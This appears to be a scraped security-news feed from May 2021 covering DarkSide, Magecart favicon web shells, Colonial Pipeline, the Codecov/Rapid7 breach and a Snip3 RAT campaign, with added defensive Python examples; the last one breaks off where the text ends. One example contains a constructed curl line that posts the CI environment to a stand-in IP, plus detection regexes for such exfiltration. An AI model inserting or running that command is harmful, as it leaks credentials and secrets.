RSS Security

General Security News

DarkSide Ransomware Gang Quits After Servers, Bitcoin Stash Seized

14 May 2021 at 15:44

The DarkSide ransomware affiliate program responsible for the six-day outage at Colonial Pipeline this week that led to fuel shortages and price spikes across the country is running for the hills. The crime gang announced it was closing up shop after its servers were seized and someone drained the cryptocurrency from an account the group uses to pay affiliates.

“Servers were seized (country not named), money of advertisers and founders was transferred to an unknown account,” reads a message from a cybercrime forum reposted to the Russian OSINT Telegram channel.

“A few hours ago, we lost access to the public part of our infrastructure,” the message continues, explaining the outage affected its victim shaming blog where stolen data is published from victims who refuse to pay a ransom.

“Hosting support, apart from information ‘at the request of law enforcement agencies,’ does not provide any other information,” the DarkSide admin says. “Also, a few hours after the withdrawal, funds from the payment server (ours and clients’) were withdrawn to an unknown address.”

DarkSide organizers also said they were releasing decryption tools for all of the companies that have been ransomed but which haven’t yet paid.

“After that, you will be free to communicate with them wherever you want in any way you want,” the instructions read.

The DarkSide message includes passages apparently penned by a leader of the REvil ransomware-as-a-service platform. This is interesting because security experts have posited that many of DarkSide’s core members are closely tied to the REvil gang.

The REvil representative said its program was introducing new restrictions on the kinds of organizations that affiliates could hold for ransom, and that henceforth it would be forbidden to attack those in the “social sector” (defined as healthcare and educational institutions) and organizations in the “gov-sector” (state) of any country. Affiliates also will be required to get approval before infecting victims.

The new restrictions came as some Russian cybercrime forums began distancing themselves from ransomware operations altogether. On Thursday, the administrator of the popular Russian forum XSS announced the community would no longer allow discussion threads about ransomware moneymaking programs.

“There’s too much publicity,” the XSS administrator explained. “Ransomware has gathered a critical mass of nonsense, bullshit, hype, and fuss around it. The word ‘ransomware’ has been put on a par with a number of unpleasant phenomena, such as geopolitical tensions, extortion, and government-backed hacks. This word has become dangerous and toxic.”

In a blog post on the DarkSide closure, cyber intelligence firm Intel 471 said it believes all of these actions can be tied directly to the reaction related to the high-profile ransomware attacks covered by the media this week.

“However, a strong caveat should be applied to these developments: it’s likely that these ransomware operators are trying to retreat from the spotlight more than suddenly discovering the error of their ways,” Intel 471 wrote. “A number of the operators will most likely operate in their own closed-knit groups, resurfacing under new names and updated ransomware variants. Additionally, the operators will have to find a new way to ‘wash’ the cryptocurrency they earn from ransoms. Intel 471 has observed that BitMix, a popular cryptocurrency mixing service used by Avaddon, DarkSide and REvil has allegedly ceased operations. Several apparent customers of the service reported they were unable to access BitMix in the last week.”

Magecart gang hides PHP-based web shells in favicons

14 May 2021 at 14:08

The Magecart cybercrime gang is hiding malicious PHP web shells in favicons to maintain remote access to compromised stores and inject JavaScript skimmers into them.

Magecart hackers are distributing malicious PHP web shells hidden in website favicons to inject JavaScript e-skimmers into online stores and steal payment card data.

Researchers from Malwarebytes observed threat actors, likely Magecart Group 12, using this technique in attacks aimed at online stores running on Magento 1 websites.

The web shells employed in the attacks, tracked as Smilodon or Megalodon, dynamically load the JavaScript skimming code into the store via server-side requests, which lets the attack bypass most client-side security tools.

“While performing a crawl of Magento 1 websites, we detected a new piece of malware disguised as a favicon. The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper PNG format for a valid image file.” reads the analysis published by Malwarebytes.

Magecart favicon web shells

The threat actors edited the shortcut icon tags to point at the fake PNG file. Unlike previous incidents observed by the experts, in which fake favicons hid malicious JavaScript code, in this wave the payload is a web shell written in PHP.

In the latest attacks, the e-skimmer code is introduced into the online store dynamically at the server-side.

The web shell retrieves the e-skimmer from a remote host; the code is similar to a variant used in the Cardbleed attacks documented by Sansec researchers in September.

The attribution to Magecart Group 12 is based on overlaps in TTPs; the experts also noticed that the domain used in the attack (zolo[.]pw) resolves to the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.

“There are a number of ways to load skimming code but the most common one is by calling an external JavaScript resource. When a customer visits an online store, their browser will make a request to a domain hosting the skimmer. Although criminals will constantly expand on their infrastructure it is relatively easy to block these skimmers using a domain/IP database approach.” concludes the analysis.

“In comparison, the skimmer we showed in this blog dynamically injects code into the merchant site. The request to the malicious domain hosting the skimming code is not made client-side but server-side instead. As such a database blocking approach would not work here unless all compromised stores were blacklisted, which is a catch-22 situation. A more effective, but also more complex and prone to false positives approach, is to inspect the DOM in real time and detect when malicious code has been loaded.”
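The Malwarebytes finding above (a file served as image/png that is not a valid PNG) points at a check a store owner or crawler can run without any signature: fetch every icon the page references and classify it by content, not by extension or Content-Type. The script below is an added example, not code from Malwarebytes or from the attackers. It treats a PHP open tag anywhere in the body as decisive, so a PNG/PHP polyglot (real image header followed by code) is caught as well; the page, icon bytes and the `fetch` lookup are constructed stand-ins for a real crawl.

```python
import re
from html.parser import HTMLParser

# Added example; not Malwarebytes' or Magecart's code.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def classify_icon_bytes(data: bytes) -> str:
    """Classify a fetched favicon body by content, ignoring extension and Content-Type.

    "php"     - a PHP open tag is present anywhere (also catches a PNG/PHP polyglot)
    "png"     - 8-byte PNG signature followed by an IHDR chunk
    "not-png" - anything else, e.g. a file that merely claims image/png
    """
    if PHP_OPEN_TAG.search(data):
        return "php"
    if data.startswith(PNG_SIGNATURE) and data[12:16] == b"IHDR":
        return "png"
    return "not-png"


class IconLinkParser(HTMLParser):
    """Collect href values of <link rel="icon"> and <link rel="shortcut icon"> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        attrs = dict(attrs)
        rel_tokens = (attrs.get("rel") or "").lower().split()
        if "icon" in rel_tokens and attrs.get("href"):
            self.hrefs.append(attrs["href"])


def icon_links(html: str) -> list:
    parser = IconLinkParser()
    parser.feed(html)
    return parser.hrefs


def audit_icons(html: str, fetch) -> list:
    """Return (href, verdict) for every favicon the page references.

    `fetch` maps an href to the raw bytes of that resource; in a real crawl it would
    be an HTTP GET, here the caller supplies a lookup over constructed data.
    """
    return [(href, classify_icon_bytes(fetch(href))) for href in icon_links(html)]


# --- constructed sample data (not samples from the campaign) ---
REAL_PNG = (  # minimal 1x1 RGBA PNG: signature, IHDR chunk, IEND chunk
    PNG_SIGNATURE
    + b"\x00\x00\x00\x0dIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89"
    + b"\x00\x00\x00\x00IEND\xaeB`\x82"
)
FAKE_PNG = b"\x89PNG" + b"<?php /* constructed stand-in for a web-shell body */ ?>"
POLYGLOT = REAL_PNG + b"<?php /* code appended after a valid image */ ?>"

SAMPLE_PAGE = """<html><head>
<link rel="shortcut icon" href="/skin/frontend/Magento.png">
<link rel="icon" href="/favicon.ico">
</head><body></body></html>"""

SAMPLE_STORE = {  # href -> bytes, standing in for HTTP responses
    "/skin/frontend/Magento.png": FAKE_PNG,
    "/favicon.ico": REAL_PNG,
}

if __name__ == "__main__":
    for href, verdict in audit_icons(SAMPLE_PAGE, SAMPLE_STORE.__getitem__):
        print(f"{verdict:8} {href}")
```

Because the skimmer is injected server-side, this content check on the server's own files (or on what the server serves) is the complementary control to the DOM inspection Malwarebytes describes; a flagged icon is a reason to look for the web shell on disk, not just to block a domain.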

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

The post Magecart gang hides PHP-based web shells in favicons appeared first on Security Affairs.

Report to Your Management with the Definitive 'Incident Response for Management' Presentation Template

14 May 2021 at 13:14
Security incidents occur. It's not a matter of 'if' but of 'when.' There are security products and procedures that were implemented to optimize the IR process, so from the 'security-professional' angle, things are taken care of. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process with their management a much more

Pakistan-Linked Hackers Added New Windows Malware to Its Arsenal

14 May 2021 at 12:04
Cybercriminals with suspected ties to Pakistan continue to rely on social engineering as a crucial component of their operations as part of an evolving espionage campaign against Indian targets, according to new research. The attacks have been linked to a group called Transparent Tribe, also known as Operation C-Major, APT36, and Mythic Leopard, which has created fraudulent domains mimicking

Ireland’s Health Service Executive hit by ransomware attack

14 May 2021 at 11:30

Ireland’s Health Service Executive shut down its IT systems after they were hit with a “significant ransomware attack.”

Another major ransomware attack made the headlines; this time the victim is Ireland’s Health Service Executive (HSE), which was forced to shut down its IT systems on Friday.

After being targeted by a significant ransomware attack, the HSE opted to shut down its infrastructure as a precaution to stop the threat from spreading. The good news is that the ongoing coronavirus vaccination campaign was not affected.

“There is a significant ransomware attack on the HSE IT systems. We have taken the precaution of shutting down all our IT systems in order to protect them from this attack and to allow us to fully assess the situation with our own security partners. Vaccination appointments are going ahead as normal.” reads a statement published by the HSE.

The authorities launched an investigation into the incident, which began at around 4.30am on Friday; government experts are working to determine the extent of the breach.

“We’ve taken a precautionary measure to shut down a lot of our major systems to protect them,” chief executive Paul Reid told broadcaster RTE. “We are at the very early stages of fully understanding the threats, the impact and trying to contain it.”

Experts fear that the ransomware attack will cause cancellations and disruption to services at multiple hospitals in the country.

According to the Associated Press, Dublin’s Rotunda maternity hospital said it was canceling most routine appointments due to the IT issues, calling the situation a “critical emergency.” The attack was classified as “fairly sophisticated” by professionals involved in the investigation.

Minister for Health Stephen Donnelly declared that the situation was having “a severe impact” on national healthcare services.

“We are working to ensure that the systems and the information is protected. Covid-19 testing and vaccinations are continuing as planned today,” he said.

At the time of this writing, Ireland’s Health Service Executive has yet to receive a ransom demand.

The attack highlights the importance of protecting critical infrastructure from cyber attacks carried out by cybercriminals and nation-state actors.

Pierluigi Paganini

Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons

14 May 2021 at 10:17
Cybercrime groups are distributing malicious PHP web shells disguised as a favicon to maintain remote access to the compromised servers and inject JavaScript skimmers into online shopping platforms with an aim to steal financial information from their users. "These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online

Colonial Pipeline likely paid a $5M ransom to DarkSide

14 May 2021 at 10:13

DarkSide demanded a $5 million ransom from Colonial Pipeline, which has quickly recovered operations. Did it pay?

The Colonial Pipeline facility in Pelham, Alabama, was hit by a cyber attack on Friday and its operators were forced to shut down its systems. The pipeline carries 2.5 million barrels of refined gasoline and jet fuel each day up the East Coast from Texas to New York, covering 45 percent of the East Coast’s fuel supplies.

“The operator of the system, Colonial Pipeline, said in a statement late Friday that it had shut down its 5,500 miles of pipeline, which it says carries 45 percent of the East Coast’s fuel supplies, in an effort to contain the breach on its computer networks. Earlier Friday, there were disruptions along the pipeline, but it was unclear whether that was a direct result of the attack.” reported The New York Times.

Earlier this week, the U.S. Federal Bureau of Investigation confirmed that Colonial Pipeline was shut down due to a cyber attack carried out by the DarkSide ransomware gang.


Colonial Pipeline has recovered quickly from the ransomware attack; all its infrastructure was restarted today.

Colonial Pipeline can now report that we have restarted our entire pipeline system and that product delivery has commenced to all markets we serve. https://t.co/kpWNw0UQve

— Colonial Pipeline (@Colpipe) May 13, 2021

Multiple media, citing people familiar with the matter, reported that the company had initially refused to pay the ransom.

However, the quick restoration of operations is suspicious and suggests that the operators of the Colonial Pipeline paid the ransom.

The New York Times reported that Colonial Pipeline paid the hackers almost $5 million worth of cryptocurrency to receive a decryption key that allowed it to restore the encrypted files. Because the tool was too slow, the company also used its backups to restore its systems.

“The operator of a critical fuel pipeline on the East Coast paid extortionists roughly 75 Bitcoin — or nearly $5 million — to recover its stolen data, according to people briefed on the transaction, clearing the way for gas to begin flowing again but complicating President Biden’s efforts to deter future attacks.” reported the NYT.

“Colonial Pipeline made the ransom payment to the hacking group DarkSide after the cybercriminals last week held up the company’s business networks with ransomware, a form of malware that encrypts data until the victim pays, and threatened to release it online.”

According to the media, once the company obtained the decryption key, it used it along with its backup system to quickly restore the impacted systems and resume pipeline operations.

Pierluigi Paganini

Big Cybersecurity Tips For Remote Workers Who Use Their Own Tech

14 May 2021 at 09:00
As the total number of people working from home has grown dramatically in the last year or two, so has the number of individuals who use all of their own technology for their jobs. If you're a remote worker who relies on your own PC to get your work done, then you may be at a heightened risk for some of the major threats that are impacting the computer industry as a whole. Relatively few people

Colonial Pipeline Paid Nearly $5 Million in Ransom to Cybercriminals

14 May 2021 at 07:57
Colonial Pipeline on Thursday restored operations to its entire pipeline system nearly a week following a ransomware infection targeting its IT systems, forcing it to reportedly shell out nearly $5 million to regain control of its computer networks. "Following this restart, it will take several days for the product delivery supply chain to return to normal," the company said in a statement on

Rapid7 Source Code Breached in Codecov Supply-Chain Attack

14 May 2021 at 07:02
Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year. "A small subset of our source code repositories for internal tooling for our [Managed Detection and Response] service was accessed by an

Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack

14 May 2021 at 06:19

Rapid7 disclosed that an unauthorized third party had access to source code and customer data as a result of the Codecov supply chain attack.

Cyber security vendor Rapid7 revealed that it was impacted by the Codecov software supply chain attack: attackers had access to data for some of its customers and to a small subset of its source code repositories for internal tools.

In April, the software company Codecov disclosed a major security breach after a threat actor compromised its infrastructure and injected credential-harvesting code into one of its tools, the Bash Uploader.

The threat actor gained periodic access to the Bash Uploader script and modified it to add malicious code that intercepted uploads and collected any sensitive information present in the CI environment, including credentials, tokens, or keys.
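The modification described above worked because CI jobs fetched and executed the uploader straight from the vendor without checking what they had just downloaded. The script below is an added example, not Codecov's uploader or Rapid7's tooling: it gates execution of a downloaded helper on a SHA-256 digest pinned out of band (in the consuming repository, not on the host that serves the script), and as a secondary, advisory check flags lines that hand the process environment to a network client, which is the shape of the injected code. Both sample scripts and the 192.0.2.10 address are constructed stand-ins.

```python
import hashlib
import hmac
import re

# Added example, not Codecov's uploader or Rapid7's tooling. Assumptions: the
# expected SHA-256 is pinned in the consuming repository (or comes from a signed
# release note), never fetched from the host that serves the script; the sample
# scripts below are constructed stand-ins, not the real Bash Uploader.

# Lines that hand the process environment to a network client (constructed heuristic
# modelled on the shape of the Codecov modification: an env dump posted via curl).
EXFIL_PATTERN = re.compile(r"\$\(\s*(env|printenv)\b|\bprintenv\b|\benv\s*\|")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_digest(script: bytes, expected_hex: str) -> bool:
    """Compare the script's SHA-256 with the pinned digest in constant time."""
    return hmac.compare_digest(sha256_hex(script), expected_hex.strip().lower())


def suspicious_lines(script: bytes) -> list:
    """Return (line_no, line) for lines that ship environment data off-host.

    Advisory only: the pinned digest already rejects any modified file. This is
    for the reviewer deciding whether to re-pin a new upstream version.
    """
    text = script.decode("utf-8", "replace")
    return [(no, line.strip()) for no, line in enumerate(text.splitlines(), 1)
            if EXFIL_PATTERN.search(line)]


def check_uploader(script: bytes, expected_hex: str) -> dict:
    """Gate for a downloaded CI helper: execute only when the digest matches."""
    digest_ok = verify_digest(script, expected_hex)
    return {"verdict": "run" if digest_ok else "reject",
            "digest_ok": digest_ok,
            "suspicious": suspicious_lines(script)}


# --- constructed samples ---
PINNED_SCRIPT = (
    b"#!/bin/bash\n"
    b"set -e\n"
    b"curl -sS -X POST --data-binary @coverage.xml https://uploader.example.invalid/v4\n"
)
# The tampered copy appends a line that posts the whole CI environment to an
# attacker-controlled address (192.0.2.10 is a documentation-range IP).
TAMPERED_SCRIPT = PINNED_SCRIPT + b'curl -sm 0.5 -d "$(git remote -v) $(env)" http://192.0.2.10/upload || true\n'
# In practice this literal is committed alongside the pipeline definition.
PINNED_DIGEST = sha256_hex(PINNED_SCRIPT)

if __name__ == "__main__":
    for name, body in (("pinned", PINNED_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, check_uploader(body, PINNED_DIGEST))
```

A digest published next to the script on the same host would not have helped here, since the attacker controlled that host; the value of the pin is that a change upstream fails the build until someone reviews and re-pins it, which is exactly the point at which the `suspicious_lines` output earns its keep.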

Codecov provides code-coverage and code testing solutions to a broad range of organizations, including Atlassian, P&G, GoDaddy, and the Washington Post.

The security breach took place on January 31, but it was discovered only on April 1st by one of Codecov’s customers.

Shortly after the disclosure of the Codecov supply chain attack, Rapid7 launched an internal investigation to determine the potential impact on its infrastructure. The experts discovered that:

  • A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7
  • These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
  • No other corporate systems or production environments were accessed, and no unauthorized changes to these repositories were made

The repositories accessed by the third party contained internal credentials and alert-related data for a subset of its MDR (managed detection and response) customers. In response to the breach, the company rotated the impacted credentials.

“We will update this notice if we learn new information that changes the scope of the impact described here. If you are a customer and have any questions or need further information, please contact your Account Team or email [email protected]” concludes Rapid7.

Pierluigi Paganini

Security at Bay: Critical Infrastructure Under Attack

13 May 2021 at 20:16

The recent Colonial Pipeline attack highlights the dangers that are facing Critical Infrastructure worldwide.

The attack on fuel pipeline operator Colonial Pipeline highlights the dangers facing Industrial Control Systems (ICS) and the need for change in the information security landscape.

The attack took place on May 7th, when the attackers deployed ransomware against the company. As a result, pipeline operations were shut down along with the company’s IT systems. A group named DarkSide claimed responsibility for the Colonial Pipeline attack.

The group has been active since August 2020 and is part of a professional crime industry that has caused billions of dollars in damage. President Biden’s remarks pointed to the involvement of actors in Russia in developing the ransomware. It is not clear whether Colonial has paid the ransom demand.

The attack brought to light how vulnerable critical national infrastructure (CNI) is, and the need for new methodologies to address threats that evolve daily in many different ways. As far as we know, this attack has shown that the prevailing understanding of information security has become outdated, as have the solutions that were supposed to protect company assets.

The impact of the attack went far beyond what was expected. Consumers were directly affected by a hike in prices, and in the Southeast some drivers started stocking up as available fuel at filling stations dropped. About 5,500 miles of pipeline were shut down; in numbers, that represents 45% of the fuel consumed between Texas and New York.

As reported by Recorded Future, ransomware groups are gaining momentum and spreading across every sector; from industry to education, everyone is a target. It is important to note that the attackers publish part of the stolen data and demand money not to publish the rest.

While the United States is the country most targeted by ransomware, attackers are also going after victims in other countries. Freedom and security are deeply rooted in the American dream, but today the whole nation sees these rights eroded by information security threats.

The US Department of Justice and a group of companies have created a task force to manage the ransomware threat. However, the leaked Equation Group tools can be the tipping point for new attacks or for the development of new ways to bypass known protections.

Little is known yet about how the company was breached, but it is certain that the goal was to obtain money rather than to sabotage the systems. Some parts of the system have been restored and the company said it will update its systems. Part of the operations are manual at this time, and it is not yet clear when supplies will return to normal.

The question now is whether the available supplies will be enough; the disruption could affect many sectors. Bitdefender released a decryption tool in January for an older version of the ransomware, but said the tool does not work for the new version. According to Bloomberg, 100GB of data was stolen in just two hours. This makes it a remarkable event, arguably the largest and most successful act of cyberwarfare to date.

Finally, we need to develop new systems and new technologies, as this could be the start of a surge of new threat actors and new attacks that cannot be stopped by current protection solutions.

Sources:

https://therecord.media/ransomware-tracker-threat-groups-focus-on-vulnerable-targets/

https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/

https://www.bbc.com/news/business-57081386

https://www.bbc.com/news/business-57050690

https://www.computerweekly.com/news/252500508/Colonial-Pipeline-ransomware-attack-has-grave-consequences

https://www.databreachtoday.com/colonial-pipeline-attack-all-monsters-are-human-a-16568

https://www.cbsnews.com/news/colonial-pipeline-ransomware-attack-darkside-criminal-gang/

https://www.bloomberg.com/news/articles/2021-05-09/colonial-hackers-stole-data-thursday-ahead-of-pipeline-shutdown


About the author: Luis Nakamoto

Luis Nakamoto is a Computer Science student of Cryptology and an information security enthusiast who has participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse engineering. He is also a prolific and compulsive writer, contributing as an editor to Portal Tic from Sebrae Nacional.

Pierluigi Paganini

Please vote Security Affairs – 1 day left

13 May 2021 at 18:38

Hi Guys
I need your support. I became aware only now that we can nominate SecurityAffairs as Best Personal Blog.

I need your support. Please vote Security Affairs as Best Personal cybersecurity Blog at the following link

https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

The URL is https://securityaffairs.co/

and indicate Pierluigi Paganini as the reference

Thank you!
Pierluigi


Organizations in aerospace and travel sectors under attack, Microsoft warns

13 May 2021 at 17:27

Microsoft warns of a malware-based campaign that targeted organizations in the aerospace and travel sectors in the past months.

Microsoft researchers revealed that organizations in the aerospace and travel sectors have been targeted in the past months in a malware-based campaign.

Threat actors conducted a spear-phishing campaign using messages that were specifically designed to be of interest to the targeted organizations. The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. The email uses an image posing as a PDF file that contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.

In the past few months, Microsoft has been tracking a dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.

— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021

The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.

— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021

The attackers used a new loader dubbed Snip3, which appears to be under active development and was recently analyzed by Morphisec researchers, who have detected a dozen versions over the last few months.

“The first stage of the attack chain is a VB Script that’s designed to load and then move the execution to the second-stage PowerShell script. We’ve identified four versions containing 11 sub-versions in this initial loader stage, with the main difference between the four being the second-stage PowerShell loading mechanism. The main difference between the 11 sub-versions is the type of obfuscation that each uses.” states Morphisec.

The final stage in the attacks observed by Microsoft is a commodity RAT such as RevengeRAT or AsyncRAT; the experts also reported additional payloads, including Agent Tesla and NetWire RAT.

Threat actors employed the malware to steal sensitive data from the victims.

The RATs are controlled via C2 servers hosted on dynamic hosting sites; they use UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites.

The Trojans continuously re-run their components until they manage to inject into processes like RegAsm, InstallUtil, or RevSvcs.

The Trojans continuously re-run components until they are able to inject into processes like RegAsm, InstallUtil, or RevSvcs. They steal credentials, screenshots and webcam data, browser and clipboard data, system and network info, and exfiltrate data often via SMTP Port 587.

— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021

The final payloads allow attackers to steal credentials, take screenshots and spy through the webcam; the stolen data is then exfiltrated via SMTP on port 587.
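The chain Microsoft describes (script host, then PowerShell, then injection into a .NET utility, then SMTP submission) is unusual enough in a normal fleet to detect on process lineage alone. The code below is an added example, not Microsoft's or Morphisec's detection content: it applies four chain rules over process-creation and network-connection events of the shape Sysmon emits (event IDs 1 and 3). The field names, the rule names, the encoded-command heuristic and the sample events are all constructed; the process names come from the Microsoft thread quoted above.

```python
import re

# Added example; not Microsoft's or Morphisec's detection logic. Event fields and
# the sample chain are constructed to mimic Sysmon process-create / network-connect
# telemetry. Process names are the ones named in the Microsoft thread above.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INJECTION_HOSTS = {"regasm.exe", "installutil.exe", "revsvcs.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Heuristic for an encoded/base64 PowerShell command line (constructed, not exhaustive).
ENCODED_PS = re.compile(r"(^|\s)-e(nc(odedcommand)?)?\b|frombase64string", re.IGNORECASE)


def _basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: list) -> list:
    """Run the chain rules over a list of event dicts; return (rule, pid) alerts in order."""
    image_by_pid = {e["pid"]: _basename(e["image"]) for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        img = _basename(e["image"])
        if e["type"] == "process":
            parent = image_by_pid.get(e.get("ppid"), "")
            if parent in SCRIPT_HOSTS and img in POWERSHELL:
                alerts.append(("script_host_spawned_powershell", e["pid"]))
            if img in POWERSHELL and ENCODED_PS.search(e.get("cmdline", "")):
                alerts.append(("encoded_powershell", e["pid"]))
            if parent in POWERSHELL and img in INJECTION_HOSTS:
                alerts.append(("powershell_spawned_injection_host", e["pid"]))
        elif e["type"] == "netconn":
            # Mail clients talk to 587; a .NET registration utility or PowerShell should not.
            if e.get("dst_port") == 587 and img in INJECTION_HOSTS | POWERSHELL:
                alerts.append(("smtp_submission_from_unexpected_process", e["pid"]))
    return alerts


# --- constructed sample telemetry (pids, paths and 203.0.113.7 are made up) ---
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\Downloads\flight-details.vbs"},
    {"type": "process", "pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgA"},   # base64 of UTF-16LE "IEX"
    {"type": "process", "pid": 400, "ppid": 300,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "cmdline": "RegAsm.exe"},
    {"type": "netconn", "pid": 400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "dst_ip": "203.0.113.7", "dst_port": 587},
    # benign: an interactive admin shell launched from Explorer, no alert expected
    {"type": "process", "pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:42} pid={pid}")
```

Each rule on its own is noisy in some environments (build agents legitimately run InstallUtil, for instance); the value is in the co-occurrence on one lineage, which is why the alerts carry the pid so a correlation layer can stitch them.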

“Microsoft 365 Defender detects the multiple components of this attack. Our researchers are closely monitoring the campaign and will share additional info and investigation guidance through Microsoft 365 security center and Microsoft Threat Experts.” concludes Microsoft.

Pierluigi Paganini

Cisco fixes AnyConnect Client VPN zero-day disclosed in November

13 May 2021 at 15:53

Cisco has addressed a zero-day in the Cisco AnyConnect Secure Mobility Client VPN software, with publicly available proof-of-concept exploit code.

Cisco has addressed a zero-day vulnerability in Cisco AnyConnect Secure Mobility Client, tracked as CVE-2020-3556, that was disclosed in November. The availability of a proof-of-concept exploit code for the zero-day was confirmed by the Cisco Product Security Incident Response Team (PSIRT) that also added that the company is not aware of threat actors exploiting it in the wild.

The CVE-2020-3556 flaw resides in the interprocess communication (IPC) channel of the Cisco AnyConnect client; an authenticated, local attacker can exploit it to cause a targeted user to execute a malicious script.

“A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script.” reads the advisory published by the company in November.

“The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user.”

It affects all AnyConnect client versions for Windows, Linux, and macOS with vulnerable configurations. The IT giant confirmed that iOS and Android clients are not impacted by this flaw.

“In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run.” continues the advisory.

“A vulnerable configuration requires both the Auto Update setting and Enable Scripting setting to be enabled, Auto Update is enabled by default, and Enable Scripting is disabled by default.”

In short, the issue can only be exploited while the targeted user has an active AnyConnect session and the attacker holds valid credentials on the same device.

The vulnerability was reported to Cisco by Gerbert Roitburd from Secure Mobile Networking Lab (TU Darmstadt).

Cisco disclosed the bug, tracked as CVE-2020-3556, in November 2020 without releasing a fix, but it provided mitigations to reduce the attack surface.

Now the IT giant has fixed the issue with the release of AnyConnect Secure Mobility Client Software 4.10.00093.

Cisco’s advisory reports that:

  • This vulnerability is not exploitable on laptops used by a single user, but instead requires valid logins for multiple users on the end-user device.
  • This vulnerability is not remotely exploitable, as it requires local credentials on the end-user device for the attacker to take action on the local system.
  • This vulnerability is not a privilege elevation exploit. The scripts run at the user level by default. If the local AnyConnect user manually raises the privilege of the User Interface process, the scripts would run at elevated privileges.
  • This vulnerability’s CVSS score is high because, for configurations where the vulnerability is exploitable, it allows one user access to another user’s data and execution space.

To mitigate the flaw, customers can disable the Auto Update feature or disable the Enable Scripting configuration setting.
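As an added illustration (not Cisco's tooling or text), a small audit of the two settings the advisory names: it assumes the AnyConnect client XML profile stores them as `<AutoUpdate>` and `<EnableScripting>` elements with true/false text, and applies the advisory's defaults (Auto Update on, Enable Scripting off) when an element is absent.

```python
import xml.etree.ElementTree as ET
# Element names are an assumption about the AnyConnect client profile schema;
# the defaults (Auto Update on, Enable Scripting off) come from Cisco's advisory.
DEFAULTS = {"AutoUpdate": True, "EnableScripting": False}


def _local(tag):
    # Drop the namespace so the check works with or without the profile xmlns.
    return tag.rsplit("}", 1)[-1]


def _as_bool(text, default):
    if text is None or not text.strip():
        return default
    value = text.strip().lower()
    if value not in ("true", "false"):
        raise ValueError(f"unexpected boolean value {text!r}")
    return value == "true"


def profile_settings(xml_text):
    """Resolve the two settings, applying defaults for absent elements."""
    settings = dict(DEFAULTS)
    for elem in ET.fromstring(xml_text).iter():
        name = _local(elem.tag)
        if name in settings:
            settings[name] = _as_bool(elem.text, settings[name])
    return settings


def is_exposed(xml_text):
    """True only when both settings are on, the combination the advisory calls vulnerable."""
    s = profile_settings(xml_text)
    return s["AutoUpdate"] and s["EnableScripting"]


# Constructed sample profiles, not taken from any real deployment.
EXPOSED_PROFILE = """<?xml version="1.0" encoding="UTF-8"?>
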